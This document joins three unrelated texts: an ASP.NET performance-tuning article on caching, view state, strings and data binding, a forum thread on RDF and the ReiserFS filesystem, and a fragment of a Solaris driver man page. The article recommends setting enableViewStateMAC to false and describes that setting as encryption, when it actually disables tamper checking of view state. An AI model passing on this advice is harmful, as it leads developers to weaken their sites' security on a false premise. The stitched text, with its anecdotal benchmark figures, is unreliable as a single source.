One warning about the caching framework I just described. If you put an extremely large number of objects into the cache and you are using the callback delegate to reload them, you may actually hurt your performance rather than help it. One site I was working on had thousands of categories and tens of thousands of products. When all of these objects were loaded into the cache, the processor pegged at 100% every 10 minutes when the cache was reloading itself. Because of this, we ended up using a caching strategy where all objects expired every 10 minutes, and then would just fall out of scope. So if a user requested the same product within the 10 minute time period they would be saved a call to the database, otherwise the site would have to create a new instance, put it in the cache, and then return it to the UI layer.
Another problem with the self reloading cache strategy is if a user requested a fairly obscure product, and no one else requests that same product for a week. Your web server will be reloading that product ever 10 minutes even though no one ever requested it. The self perpetuating caching strategy is best for high volume sites, but with a smaller product base. Exactly how many objects becomes to many depends on your server’s memory resources and its processor. But PerfMon is a great way of measuring if the server can handle this strategy.
When inserting an object instance into cache, there is another option that you can use to create a more efficient self-perpetuating cached strategy. There is a class you can use called CacheDependency. When you insert an object into the HttpRuntime.Cache class, you can also pass in an instance of the CacheDependency class. What this class does is act as a trigger to kick your object out of cache. When the CacheDependency’s trigger is fired, it will tell the Cache class to kick the object it is associated with out of cache. There are two types of cache dependencies; a file dependency and cached item dependency. The file dependency version works by using an internal class called FileChangesMonitor. This class monitors whatever file you specify and when the file changes, it will invoke its FileChangeEventHandler, which the HttpRuntime.Cache class has registered a callback function to. This callback will trigger the HttpRuntime.Cache class to kick out whatever object has been associated with the CacheDependency instance.
CacheDependency
FileChangesMonitor
FileChangeEventHandler
So how can we use this to create a more efficient self-perpetuating caching strategy? We accomplish this by putting SQL Server triggers on the tables that hold the data that the objects hold. Let’s use our Product class again as an example. And let’s also say that our database has 250 different types of apples in it, each with its own ProductID. We create a trigger on the Product table, so that every time a row in the Product table is changed, it creates a file somewhere on the network and sets the text of the file to “0”. If the file already exists, the trigger would just update the file. The key to this whole strategy is the file name and the text in the file. The text is just one character, and every time the trigger updates the file, you just change the character from “0” to “1” or “1” to “0”. The file name is the ProductID of the product that just got changed.
ProductID
So when inserting an apple Product object into cache, create a CacheDependency instance that references the file whose file name is the same as the ProductID of the object being put into cache. In this case, you do not pass an expiration time into the Cache.Insert() function like before, but you do still specify the callback delegate. Once the apple Product is inserted into cache, it will stay there until the data in the database is changed. When this happens, the database trigger will fire and update the file. This causes the CacheDependency to trigger, and your Product instance gets kicked out of cache. Your callback function then calls the database, recreates the Product instance with the new data, and then inserts it back into the cache. This will dramatically cut down on the number of database calls and your objects will only refresh when they have to, which will dramatically cut down on the load of your web server’s processor load.
Cache.Insert()
Another hashtable that you can take advantage of for a caching strategy is the HttpContext.Current.Items class. This class was originally designed for sharing data between an IHttpModules and an IHttpHandlers during an HTTP request, but there is nothing stopping you from using it within an aspx page or any assembly within the call stack that your aspx page starts. The scope of this hashtable is the duration of a single HTTP request, at which point it will fall out of scope as well as any object it references.
HttpContext.Current.Items
IHttpModules
IHttpHandlers
This hashtable is the perfect place to store objects that have a short lifespan, but are accessed multiple times during the span of a single Request. A good example of this might be connection strings that your site stores in a file or in the registry. Let’s say your data access assembly has to read its connection strings from the registry and decrypt them each time it calls the database. If the data access assembly is called several times during a single request, you could end up reading the registry and decrypting the connection string more often than necessary. One way around this repetition is to put the decrypted connection string into the HttpContext.Current.Items hashtable the first time it’s needed during each request, and then every other time during your data access assembly is called during that request, it can just pull the connection string from the HttpContext.Current.Items class. Now I know what you may be thinking. Why not just store off the connection strings in a static field and hold it for the life time of the application? The reason I would stay away from this is that if you ever needed to change your connection strings in the registry, you would have to restart your web application in order to get them reloaded into your static fields. But if they are only stored for the life of each request, then you can change the registry without fear of bumping people off your site.
Now connection strings might not be a very good example, but there are many types of objects that can take profitable advantage of this caching strategy. For instance, if you are using Commerce Server, then this is a really good place to store objects such as CatalogContexts or ProductCatalog objects, which can get created many times during a single HTTP request. This will give you a great performance gain in your site.
CatalogContexts
ProductCatalog
Page and control caching is an obvious tool and is very well documented in MSDN, as well as many ASP.NET books, so I wont go over them very much except to say use them if possible. These techniques can dramatically increase your requests per second metric.
When ASP.NET first came out, and I heard of view state and what it did, I was overjoyed! Then I actually saw just how much text there was in the View State and my joy disappeared. The problem with view state is that it not only stores the data on the page, but it also stores the color of the text, the font of the text and height of the text, the width, the…well, you get the picture. One of the pages we developed was so large that the view state was 2 meg! Imagine trying to load that page in a 56K modem.
Now, I’m not smart enough to suggest to Microsoft how to create a better view state, but I do know that on some pages you just can’t use it. It’s just too big and it takes too long to download. And granted, with view state on, you don’t have to reload your entire page on a post back, but if you have an efficient HTML rendering strategy (which I’ll talk about last) then I think the time cost of re-rendering the page will offset the time it takes to download the view state to the client (Not to mention the time it takes to decode and encode the view state for each request).
If you do decide to use view state, take a look in your machine.config file, in the <pages> element and make sure that the enableViewStateMAC attribute is set to “False”. This attribute tells ASP.NET if it should encrypt the view state or not. I don’t like to put anything confidential in the view state, and hence don’t care if it’s encrypted or not. Setting this value to false, which will disable the encryption, will also save you a little bit of time per page, especially if your page is carrying a large amount of view state.
<pages>
enableViewStateMAC
False
false
One quick note that might save you a few days of troubleshooting: If you do set enableViewStateMAC to true and you are operating in a server farm that is load balanced, you will also need to make sure that each server has the same encryption / decryption key. The encryption algorithm that ASP.NET uses to encrypt view state is based on a machine key. This means that view state encrypted on server ‘A’ wont be able to be decrypted if Server ‘B’ handles the return request, and you’ll get a view state exception. To fix this problem, set the validationKey attribute of the <machineKey> element in the machine.config file to a hexadecimal string from 40 to128 characters long (128 characters is recommended). You’ll need to set this on every web server with the same key. This will enable one server’s view state to be decrypted and used on another server.
true
validationKey
<machineKey>
I have two other config file observations that do not really fit anywhere else and since I just talked about the machine.config, this is as good a spot as any. There is an attribute in the machine.config file that lets you allocate the % of memory that your web server has for use by the ASP.NET process. This is the memoryLimit attribute of the <processModel> element. Its default value is set to 60%, but I’ve found that I can get away with 80% without any adverse affects on the web server and if you are implementing some sort of caching strategy, as discussed above, and your product list is fairly extensive, this is something you may want to consider changing.
memoryLimit
<processModel>
The second item is the <compilation> element in the web.config file. This element has an attribute called debug. When moving your code over to production, you should make sure to change this to ‘false’. This attribute does not affect the C# or VB.NET compilation of your code into an assembly. If you compile your assembly with this setting set to true, then again with it set to false, and then compare the IL code of the two assemblies using ILDASM, you won’t see any difference between the two compilations. But this attribute will affect the JIT compiler and cause your site to run a little faster if set to false. My guess is that the JIT compiler uses this flag for compilation optimizations.
<compilation>
debug
One of the classes that Microsoft released with the .Net Framework was the StringBuilder class in the System.Text namespace. This class is a high performance way to concatenate text together to build large text blocks. String concatenation in the old ASP days was extensively used to help build HTML output, but it really hurt page performance. So now that we have the StringBuilder, you might think that it is the best choice for string concatenation, right? Well, yes and no. It depends on the situation and how you use it.
System.Text
The general rule for string concatenation is use the StringBuilder if you are going to concatenate 5 or more strings together. For 2 – 4 strings, you should use the static String.Concat function. The String.Concat function takes two or more strings and returns a new string that is a concatenation of all the ones passed in. You can also pass in any other data type into the Concat function, but it will just call ToString() on these types and do straight ‘+’ style string concatenation on them, so I’d avoid using it for anything but strings.
String.Concat
Concat
ToString()
If you take a look at the String.Concat method in Anakrino (in the mscorlib file), you’ll see that if you pass 2 or more strings into the function, the function first adds up the total number of characters for all the strings passed in. It then calls an extern FastAllocateString function, passing in the size of the new string it is going to build, which I assume allocates a block of memory big enough to hold the entire return string. Then for each string passed in, Concat calls another extern function called FillStringChecked. This function takes a pointer to the block of memory that was allocated in FastAllocateString, the beginning place in memory for the string being added, the ending point in memory, and the string to add. It does this for each passed in string to build the newly concatenated string, which it then returns. This is a very fast way to concatenate 2 – 4 strings together, and from my tests with the .NET Test Harness, the String.Concat function outperforms the StringBuilder by 130%.
extern
FastAllocateString
FillStringChecked
This sounds straight forward enough, right? For 2 – 4 strings, use String.Concat, and for 5+ strings, use StringBuilder. Well almost. I got an idea in my head and thought I’d profile it in the .NET Test Harness, as well as PerfMon, to see what would happen. Since String.Concat can take up to 4 strings, why not use one String.Concat to concatenate the outputs of 4 inner String.Concat calls? So I setup the test and found that for up to 16 strings, nesting String.Concat functions inside an outer String.Concat function, it would outperform the StringBuilder class by 180% (1.8 times faster). The other thing I found with this method was that PerfMon counter, % in Garbage Collector, was much lower when using nested String.Concat functions (but in order to see this, you’ll have to perform the test thousands of times in a row). This is great news if your site does a large amount of string concatenation. The only problem with nesting String.Concat functions is that it makes the code fairly hard to read. But if you really need to boost your page performance, then you might want to consider it.
If you find that you need to use the StringBuilder to build large blocks of text, there are a few things you can do to make it work a little faster. The way the StringBuilder works, if you use the default constructor, is that it has an initial capacity of 16 characters. If at any time, you add more text than it can hold, it will take its character capacity and doubles it. So by default, it will grow from 16 characters, to 32, to 64, to…you get the picture. But if you have a good idea as to how big the string you are trying to build will be, one of the StringBuilder constructors takes an Int32 value, which will initialize its character capacity. This can give you better performance, because if you initialize the StringBuilder to 1000, it won’t have to allocate more memory until you pass in 1001 characters. The performance gains for pre-initializing the StringBuilder isn’t all that much, about 10% – 15% depending on the size of the finished string, but its worth playing around with, if you have a good idea how many characters you are going to add.
There is one more item I’d like to address when talking about strings, and that is checking for an empty string. There are two basic ways to check if a string is empty or not. You can compare the string to the String.Empty static property, which is just a constant for “”:
if (firstName == String.Empty)
Or you can check the length of the string, like this:
if (firstName.Length > 0)
I setup a test in the .NET Test Harness and found that the String.Empty comparison check was 370% slower than the length check. This may seem fairly trivial, but every little bit helps, right?
If you have any classes that have a fair number of private fields, there are two different techniques you can use to initialize the class' private fields, and which one you pick can affect performance. Here is a common scenario. Let's say you have a Product class that has 45 private fields, 45 public properties that encapsulate them, and two constructors; a default constructor that will create an empty product and one that takes a DataRow that is used to populate the 45 fields. You should initialize the 45 fields somewhere because if you create an empty product, you might want to give your properties some default values. But where should you initialize the fields? Where they are declared or in default constructors?
If your code uses the technique that initializes the fields where they are declared like:
private int maxNumberAllowed = 999;
and then you create a new Product instance using the default constructor, then you have a perfectly good Product instance that you are ready to use. But what happens if you create a new Product instance using the DataRow constructor? Each field will be assigned to twice! Once when it gets declared and a second time in the DataRow constructor.
The best practice is to do all class level field initializations in the constructors. You may end up duplicating your initialization code in each constructor, but you’ll be guaranteed that each private field gets assigned to only once per class creation.
So to show what this can do to performance, I created a test with the .NET Test Harness. I created two classes, each with 50 private fields. The first class initialized its private fields where they were declared, and the second class did all initialization in the constructors. And both classes have two constructors, a default one and a DataRow one. When I created a Product instance using the DataRow constructor, the class that initialized its private fields where they were declared was 50% slower then the class that had all its initialization code in the constructors. When I created a new Product instance by calling the default constructor, both versions were relatively the same.
I’m not going to spend a lot of time going over exception handling, except to say that throwing exceptions are very costly for performance. You only want to use a try / catch block when you need to trap for an error. You never want to use it to control and direct the program’s process flow.
For example, I’ve seen this code used (and the .NET Framework actually uses this in its VB function IsNumeric):
IsNumeric
public bool IsNumeric(string val)
{
try
{
int number = int.Parse(val);
return true;
}
catch
{
return false;
}
What if you have an XML block that has 50 values and you want to see if all 50 are numeric? If none of the values in the XML block are numeric, then you just threw 50 exceptions needlessly!
Multithreading is a powerful way to get a few more requests per second out of your site. I am by no means an expert in multithreading, so I won't pretend to know enough to give you some insight into its usage. I can recommend a book by Alan Dennis called ‘.NET Multithreading’ since he does a good job describing the ins and outs of multithreading. I do want to mention a warning though. While multithreading can be very powerful and speed up your pages, if you are not extremely careful it can introduce very subtle and hard to debug problems in your code. Also, it’s commonly thought that your code can just spawn off as many threads as it needs to get the job done. But creating too many threads will actually hurt performance. Remember, there are only so many processors on your server and they are shared across all threads.
Having a disconnected data source such as DataSets is great, and the ability to make changes to your disconnected DataSet and then reconnect to your data source and sync the changes is truly amazing. But in my opinion, this should strictly be used when performance is not an issue. For read only database access, the DataReader will give you an amazing performance gain over the DataSet.
DataReader
I once again used the .NET Test Harness and created two tests. The first test made a call to my database, filled a DataSet with 50 rows of 10 columns, iterated through each DataRow in the DataTable and pulled the data out of each column in the DataRow. The second test did the same thing, except with a DataReader. Since the DataAdapter uses a DataReader internally to populate the DataSet (I used the Anakrino tool to look into the internals of the DataAdapter), I assumed that it would be faster than the DataSet. But I was surprised as to how much faster the DataReader really was. Under both Debug and Release builds, the DataReader was 75% faster then the DataAdapter!
DataAdapter
But what about the DataSet’s built in ability to update any changes to the database? True, the DataReader can’t handle this. But in my opinion, the best strategy for high speed database access, meaning read, update, insert and delete, is through the use of stored procedures. I’m not going to go into any detail in that area, since it is outside of the scope of this article. My rule of thumb is to try and avoid using DataSets altogether in web development. I generally will only use them in my WinForm applications when I’m trying to appease only one user per AppDomain.
The biggest argument I hear when telling people not to use DataSets in web development is that they are so handy for data binding to ASP.NET web controls, you can’t bind a Repeater control to a DataReader. As with DataSets, my rule of thumb for data binding is ‘don’t do it!’, and I’ll tell you why in the next section.
Repeater
The final topic I wanted to cover is how to pull data out of a DataSet (if you insist on using them) or a DataReader. Both the DataRow and the DataReader have indexers to access the values out of the columns. The two most commonly used ways to get data out of these objects is to call the ToString() method after the indexer like this:
string temp = dataReader["FirstColumn"].ToString();
This is OK. But what if you are trying to get an Int32 out of the DataReader instead of a string? This is one way I’ve seen:
Int32
string
int temp = int.Parse(dataReader["FirstColumn"].ToString();
The other way that I see is this:
int temp = (int)dataReader["FirstColumn"];
So can you guess which one is faster? If you guessed the second one, then you’re correct. DataReaders and DataSets store their underlying data as object types. So you can cast the Int32 directly out of the DataReader. If you call the ToString() first, you are unboxing the object to a string, then calling Int32.Parse on a string, which will cast it to an Int32. This may seem fairly common sense, but I have seen code that uses the ToString() method and so I was interested in just how much faster the direct cast was. When I used the .NET Test Harness, I found the direct cast was 3 times faster! That’s a pretty huge performance gain to miss out on because of a simple casting mistake.
Int32.Parse
The one other way to get data out of a DataReader is to use its DataReader.Getxxx methods. The main reason I try to avoid using them is that they only take a numeric based column ordinal. I try to use the column names in the indexer because if you ever change around the order of the columns in your stored procedure, you won’t introduce a subtle but in your code.
DataReader.Getxxx
When .NET was released, many web developers were ecstatic when they saw how easy it was to use server side ASP.NET controls. Slap the control on the page, set a DataSet or ArrayList to the DataBind property and away you go, instant web pages. No more looping through RecordSets in your ASP to build your HTML. This is so easy!
ArrayList
DataBind
RecordSet
It is easy, but at a cost. I recently worked on a project that used data bound ASP.NET DataList and Repeater controls extensively to build their web pages. But the performance results were very disappointing. Using ACT to run some load tests on these pages, with a small number of concurrent users (5), the page performed reasonably well. But as soon as we increased the number of users to something more realistic, like 25, the page performance went to pot. So we started using PerfMon while the tests were running, and found something pretty interesting. The % time in garbage collection for the page was averaging 30%, with a maximum spike of 45%! Also, the % Processor was pegged at 95% for the entire test run. These last two statistics were big red warning lights, because they told us that not only did our pages run slow, but they were not going to be able to scale out at all. If the site had a high load of users, it would be in serious trouble.
DataList
This was no good and was not acceptable for a release to production, so we started digging into how the data bound controls worked. What we found out was that the data binding process was doing two things that were hurting performance. First, data bound controls use reflection to find the correct property and pull the data from it. Reflection is fairly costly and if you have a repeater control that is pulling 6 properties from an array of 40 objects, the performance hit can really add up.
The second thing we noticed was that the number of objects that were being created during the data binding process was pretty high (look in Anakrino at the DataGrid, DataList and Repeater class’ CreateControlHierarchy to see how it does its binding). This high number of objects being created was what was kicking the % time in garbage collection so high.
DataGrid
CreateControlHierarchy
So we had to find a way to create web pages without using data binding. We tried using ASP.NET server controls and manually pushing the data, but this didn’t really change our statistics very much. Then we got desperate, and really started brainstorming. We tried placing one Literal control on each page and used a StringBuilder in the code behind’s PageLoad event to build the HTML structure for the page and then slapping the HTML into the Literal control’s text property. This technique performed amazingly well and the % time in garbage collection went down to almost nothing. But the maintainability of the HTML would have been a nightmare.
Literal
PageLoad
text
We then decided to try mixing ASP.NET code behind with an ASP style of HTML building. We created and populated all our data objects, as well as put any business logic the page needed in the aspx’s code behind PageLoad event. Then in the aspx file, we went back to ASP style HTML building, using old fashioned <%=(C# code)%> to actually inset data from our data objects into the HTML. This technique performed just as good as the string builder technique, but the maintainability of the code was much better.
<%=(C# code)%>
The only problem with this ASP style of HTML rendering is that you are back to writing the HTML to a forward only stream, just like ASP. When using ASP.NET controls, you can update the value of any control, during any stage in the code. But web developers have been doing this since the beginning of ASP, so in extreme situations where ASP.NET controls just won’t perform, then this is a workable option.
Once we had our test page coded this way, I ran ACT on the data bound version and the new ASP style version, and compared the results. During a 15 minute run with 10 users, the ASP style page was able to run iterations as many times as the data bound version. The average requests per second jumped from 72.55 to 152.44 requests per second. The average time to last byte went from 21.79 milliseconds down to an amazing 2.57 milliseconds! But the best statistics came from the % time in garbage collection and processor %. The average % time in garbage collection went from 30% down to .79%, and the average processor % went from 95% down to 10%! This meant that our ASP style pages would scale out to a higher number of users with very little trouble.
Some of the performance test results I talked about in this article truly amazed me when I first saw them. But does that mean you should implement everything I talked in this article? Nope. Take data binding ASP.NET server controls, for example. Should you ban them from your site from now on? I hope not. I think they are great and serve a good purpose. What you need to do is decide how important a page is to the success of your site. With many sites, 90% of the pages requested are only 10% of the pages the site actually contains. Parsing your IIS logs is a good way to see how often each page is called, and in turn, deciding how vital that page is to your site's success. Performance tuning your code usually comes at the cost of increased complexity and loss of maintainability. You should weigh the benefits of any possible performance change to each page. In the project I was just talking about, we decided to drop ASP.NET controls and rewrite only the 8 most requested pages, but left other 80+ pages the way they were, using data bound controls.
The secret to developing a site that screams is to get yourself a good set of performance analysis tools and really learn how to use them. Profile and analyze what your code is doing, and adjust accordingly. Use Anakrino and dig into the code of the classes you are using, and learn what is really going on in the background. Try prototyping several different ways to do any given functionality and see which one works the fastest. You’ll write more efficient code and gain a deeper understanding of .NET along the way.
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
<pre><br />
abstract class DoLoginFields<br />
{<br />
public const int UserName = 0;<br />
public const int Password = 1;<br />
}<br />
</pre>
if (String.Empty.Equals(firstName))
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | https://www.codeproject.com/Articles/6010/Performance-Strategies-for-Enterprise-Web-Site-Dev?msg=3554239 | CC-MAIN-2017-26 | refinedweb | 11,490 | 69.41 |
Feedback
Getting Started
Discussions
Site operation discussions
Recent Posts
(new topic)
Departments
Courses
Research Papers
Design Docs
Quotations
Genealogical Diagrams
Archives
Eureka, the perfect RDF introduction with thanks to A.M. Kuchling (amk). Nothing beats crayon-colored diagrams. It is short, sweet, and hits the main points precisely, including 'political' issues at the end. Much W3C advocacy makes the Semantic Web sound too futuristic....The RDF Core spec is hard to read and really boring....Introductory tutorials are few....Simple things can be done without much effort, and can still be useful.
Much W3C advocacy makes the Semantic Web sound too futuristic....The RDF Core spec is hard to read and really boring....Introductory tutorials are few....Simple things can be done without much effort, and can still be useful.
On one island are the semantic web folks. On another island are semantic filesystem folks. A summit seems in order. I don't hear much about the two working together, but then I live on yet another island. RDF+ReiserFS looks like a match made in heaven, for example, Reiser4 uses dancing trees, which obsolete the balanced tree algorithms used in databases...Do you want a million files in a directory, and want to create them fast? No problem.
Reiser4 uses dancing trees, which obsolete the balanced tree algorithms used in databases...Do you want a million files in a directory, and want to create them fast? No problem.
From the article,
Reiser has "substantial plans" for adding new kinds of semantics to ReiserFS to help it challenge Microsoft's efforts. "We're planning on competing with the Longhorn filesystem," he says.
The new ReiserFS will eschew the relational algebra approach and work with semistructured data. "The person entering data can employ [the] structure inherent in the data rather than forcing a structure," Reiser said, adding, "Flexibility in querying and creating data is our target. [This] will stand in contrast to Microsoft's SQL-based approach, which does not have that flexibility."
I'm not sure what semistructured data is supposed to mean. RDF triples are structured data, as far as I can see. Graphs are structures, aren't they?
semistructured data
[The] structure inherent in the data sounds a bit metaphysical - how is this Philosophick Mercury to be extracted?
[The] structure inherent in the data
Dancing trees sounds intriguing, though.
Dancing trees
'semistructured' refers to the fact that RDF data models do not necessarily adhere to a strict schema (unlike, say, the ER model which is structured).
(subject predicate object) is pretty strict! But it's a mini-structure from which larger structures (that happen to be graphs) can be assembled. Reiser's names are also mini-structures: it's not that they're unstructured in any way (which is why I wonder about the semi-), but that the structure of a lot of them put together isn't totally predetermined by the structure of one of them by itself. In a DB schema, the structure of all of the pieces put together is already decided before you put any of the pieces in.
(subject predicate object)
The goal of the current semantic technologies is to enable not merely the creation of semantic information, but also the automated processing of that information.
semantic
RDF is not just a notation: it's also a data model (strictly speaking, RDF/XML or N3 or what have you are notations; triples and graphs are the data model). Given that data model, it's possible to do some automated processing of semantic information by algorithmic means: graph traversal, for instance. The data model allows us to say things like, in order to make valid inferences based on these statements, perform these operations on the graph made up by the triples representing the statements.
in order to make valid inferences based on these statements, perform these operations on the graph made up by the triples representing the statements
The semantics of the semantic web, as currently understood and practised, represent a highly constrained subset of the semantics of what we might call ordinary knowledge construction. There are things that I can know and say about the contents of my file system that are fairly difficult to put into RDF triples (I don't know whether there are any things I can know and say about the contents of my file system that it would be impossible to put into RDF triples).
To be more precise, the translation of the kinds of stuff human beings think they know, and the kinds of meanings they like to bandy about, into machine-processable semantic information generally entails a degree of (re-)formalization. We have not only to discover [the] structure inherent in the data, but also to derive a representation of that structure that will fit into our data model; and this is true even if the data model is claimed to support semistructured data.
[the] structure inherent in the data
semistructured
The difficulty is then of the following kind: the process of formalizing semantic information so that it can be processed by an automaton is not itself automatable (or at least not by the same process that the machine will use to process the formalized semantic information; there might be some higher-order process, but the same problem would then apply at the higher level). The person entering data still has a job to do (apart from just typing the stuff in), and it is not necessarily an easier job than the job of the old-fashioned suit-wearing person who performs domain modelling and creates relational database schemas.
difficulty
The person entering data
The (marketing) promise of the Longhorn FS has been that ordinary users will be able to transfer the things they know about the contents of their file systems into the machine, so that the machine will be able to do a variety of smart things with that information. The creation of better and easier-to-use tools for the (re-)formalization of human knowledge is I think a Good Thing; but there is an unfortunate tendency for such tools to be marketed as if they did the job themselves (or magically altered reality so that the job no longer needed to be done).
I would like to have, and could see myself benefiting from the use of, semantic technology in my file system. Even a few user-definable metadata tags that could be addressed by a straightforward query language would be useful. However, Google's desktop search (which chucks semantics out of the window and does pure syntax-crunching text processing) is currently more useful to me than any existing semantic technology, and I think this is because it places less of an onus on me as the end-user to translate myself into automatonese. Google's search engine just gets on and does what machines are good at doing. Semantic technologies want to be your friend.
Domninic: I believe the term "semistructured data" is used in the sense Reiser uses it in his future vision whitepaper (a great read, BTW). In that document it's used as opposed to traditional tree and relational database models. Reiser's idea is more of a "soup" against which very specific, or very general queries can be run. In this sense it does apply well to RDF.
Reiser's naming scheme mingles structural information of various kinds with content, so that a name can describe a more or less complex data structure into which its parts are then slotted. It looks pretty neat. I don't think it looks much like RDF, though. You could probably model its primitives using RDF primitives, but they're still different sets of primitives.
The islands are not 100% identical. That wasn't the point. It was that they share similar dreams and should probably talk. Both want data pools built on low-level concept primitives, semantic queries, distributed data pools, and enhanced end-user experience. Neither wants end users to become DBAs, as far as I know. Those tasks are for application programs. The paper mentioned touches on many of Dominic's points, like the Google desktop (text keywords), subsets of human knowledge, and the issue of distributed stores.
While the implementation of Microsoft's attempt to blur the distinction between the filesystem name space and the web namespace is one more of appearance than substance, it is surely the right thing to do for Linux as well in the long run. We should simply make our integration one with substance and utility, rather than integrating mostly the look and feel.
That statement sounds very RDF-semantic-webish to me. RDF is terribly simple and terribly powerful, but RDF market-speak is wrapped up in abstract goo. That is one reason I made the post. RDF needs more "RDF for Dummies" to gain traction out there.
Bridges aside, ReiserFS might be an ideal persistence medium for RDF.
Even RDF isn't fixed in stone right now. There is talk about a fourth element to solve the provenance problem. Talking to ReiserFS folks might be very fruitful, that's all. Certainly these islands should know of each other's existence. That seems not the case right now, but I could be very happily wrong.
That statement sounds very RDF-semantic-webish to me. RDF is terribly simple and terribly powerful, but RDF market-speak is wrapped up in abstract goo.
I'm with you 100%. Too many RDF evangelists and triple-store vendors tout the "flexibility" of RDF like a silver bullet, and play dumb when you try to get them to speak to the hidden tradeoff with respect to managability. Anyway it's an interesting problem and really does fill a need, but we live in a world where relational data architects outnumber "ontologists" 10000 to 1, and I'm yet to be convinced that it doesn't matter.
Even RDF isn't fixed in stone right now. There is talk about a fourth element to solve the provenance problem.
That's very interesting news to me, as it addresses a very specific issue with RDF that I happen to be up against at the moment. Do you happen to have a pointer to any discussion underway about this? Has a proposal been formalized yet? I'd like to follow up with this...
The fact that RDF as it stands includes a (for some reason not terribly popular) approach to reification of statements, so that they can in turn be the object of statements such as S asserts that P, maybe points to the need for a more general mechanism for indicating provenance. I don't know, though; I would be interested to see the arguments on both sides. There is more than one sort of provenance, or more than one sort of possible relationship between S and P: S has verified that P, for instance, or even S strongly intuits that P...
Yeah, I'm definitely aware of reification and all the performance and manageability issues it entails (no pun intended). And certainly in the most general case a reification standard is absolutely essential.
But in many cases there's a fixed set of statement metadata that we want to be able to store and query in a very efficient way. We want RDF extended to something like:
(subject, property, value, date added, source, version, status)
where status is something like "approved", "pending", "rejected", "obsolete"...
The current answer we're hearing from triple-store vendors is "use reification," but frankly it's a pretty poor answer when you're looking for a production-ready system. If a triplestore is really unable to accommodate something as simple as "date added" without relying on reification in its general form (and inference to boot, since I want to enforce that a statement can only have a single "date added"), I'm afraid it'll never perform.
I'm also afraid that ontology design would become a total nightmare, since I'd have to distinguish those statements that require this audit trail from those that don't. You certainly don't want to require that every "date added" statement have its own "date added" record (infinite regress, anyone?).
On the other hand, if I heard a truly compelling case that an implementation has completely solved the performance problems (time and space complexity) of reification, I could probably be convinced to model it that way. (Assuming I can find a qualified ontology design expert, but that's going back to a different fork in this thread...)
(I suppose maybe this is getting off-topic?)
It sounds as if you want something like:
(statement_id subject property object)
that could then be joined to whatever metadata-about-statements you liked in some other table(s), e.g.:
(statement_id date_added source version status)
(statement_id revision_number revision_date revised_by comments)
The point being that the things you want to know about your triples will tend to be fairly fixed and regular, and RDF + reification is maybe not an ideal way of representing those things; at the same time, I doubt whether you could get every possible user of an RDF store to agree on the same schema for metadata-about-triples. A statement ID field could be used to provide a link between the RDF and relational worlds.
I also think many people who have problems with reification as a solution fail to take into account that it is a conceptual mechanism, not necessarily an implementation mechanism.
What I mean is that most triple stores have support for context. This is typically implemented using a quad structure for rdf statements, where the fourth place encodes a grouping identifier. This grouping identifier in many systems is a provenance identifier (the source of the data), but it could equally well be agnostically implemented, that is: no semantics. Then such a grouping mechanism can be used to support date stamps, provenance, versions, etc. To the outside, the store could represent this information as reified RDF, but internally it could store it a lot more efficiently than just adding seven additional statements for each reification (which obviously does not scale too well).
Thanks to everyone in this thread. I've got some digesting to do... My problem may be as simple as not talking to the right vendors... I'm still a bit reluctant to do this the "pure RDF" way, and Dominic really hit the nail on the head with his proposed RDF->relational join schema. That, to my mind, is the simplest, most elegant solution, and is basically what I'm looking for. We'd also like the storage layer to be aware of the metadata for the purposes of querying, etc., but it may be OK to build that as a separate layer, given the ability to do very efficient joins.
Anyway, thanks for all the food for thought.
...that it might relate closely to what we call today file permissions and ownership. That linkage argues even more for discussions with ReiserFS people.
Come to that, there might be linkages to the Mozart Oz worldview and its various security issues (message passing stored procs).
Wish I could help more, but maybe experts will speak. I invited Reiser himself. His work is truly fantastic and LtU folks should know about it, regardless.
Still more strangeness about the isolation of these islands is that DARPA funds both!
Just to respond to Matt & Dominic's points, RDF *is* a relational world, just that everything's expressed as binary relations. Imagine every predicate (property) as a separate table in a RDBMS with a column for subject and a column for object. There are various ways of representing n-ary (multi-column) relationships in triples with or without reification, there's even a best practices doc on it.
But generally I don't think it's likely to be a big problem in practice. Most datastore implementations include something that makes tracking provenance easy (the named graph approach seems to me the most straighforward). You might need reification when passing data between systems, but when storing and processing the data there's nothing to stop you going outside the RDF model locally.
Binary Relations were discussed on LtU, and Dominic brought up their relationship with RDF...
Is this summit a physical world event?
My phone is +1 510 482-2483.
Hans Reiser
Architect
ReiserFS
Namesys.com
...that the two groups should communicate, since their goals are similar. The RDF people do have conventions, surely. (Try Google, I'm not the one to ask.) I think you would make a fantastic invited speaker at such an event. Thanks for your wonderful work, by the way!
...ZigZag? There seem to be parallels. (I'm not claiming exact match, just similar intent, as with ReiserFS.) Manu Simoni comments that
Technically, ZigZag is a database and visualization/user-interface system for a subset of general graphs - the restriction is that a node may have only one incoming and one outgoing edge with a given edge label. So structures are organized as lists/strings of nodes, which makes it easier to visualize than general graphs, that can have any number of edges with a given label incoming/outgoing on a node.
The ZigZag-for-personal-computing vision, as I understand it, is to represent all information using interconnected graph structures, and to offer different visualizers and mini-applications that know how to display or manipulate different structures (as opposed to today's unconnected files and black-box applications). So where today's OSes offer folders and files as structure, a ZigZag system offers a much more fine grained structure.
I wonder where exactly is it that I'm living on...I have just finished my Msc. thesis on an AOP framework that aims at representing an application and its different perspectives with RDF/OWL. The so-called weaver should hopefully become smarter (the way a web-agent would in the SW-world). | http://lambda-the-ultimate.org/node/404 | crawl-002 | refinedweb | 2,994 | 60.75 |
#include <sys/stat.h> #include <sys/sunddi.h> int ddi_create_minor_node(dev_info_t *dip, char *name, int spec_type, minor_t minor_num, char *node_type, int flag);
Solaris DDI specific (Solaris DDI).
A pointer to the device's dev_info structure.
The name of this particular minor device.
S_IFCHR or S_IFBLK for character or block minor devices respectively.
The minor number for this particular minor device.
Any string literal that uniquely identifies the type of node. The following predefined node types are provided with this release:
For serial ports
For on board serial ports
For dial out ports
For on board dial out ports
For hard disks
For hard disks with channel or target numbers
For CDROM drives
For CDROM drives with channel or target numbers
For tape drives
For DLPI style 1 or style 2 network devices
For display devices
For pseudo devices
If the device is a clone device then this flag is set to CLONE_DEV else it is set to 0.
